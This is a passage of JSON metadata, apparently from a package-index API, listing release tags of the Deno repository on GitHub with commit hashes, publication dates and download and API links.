deno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9f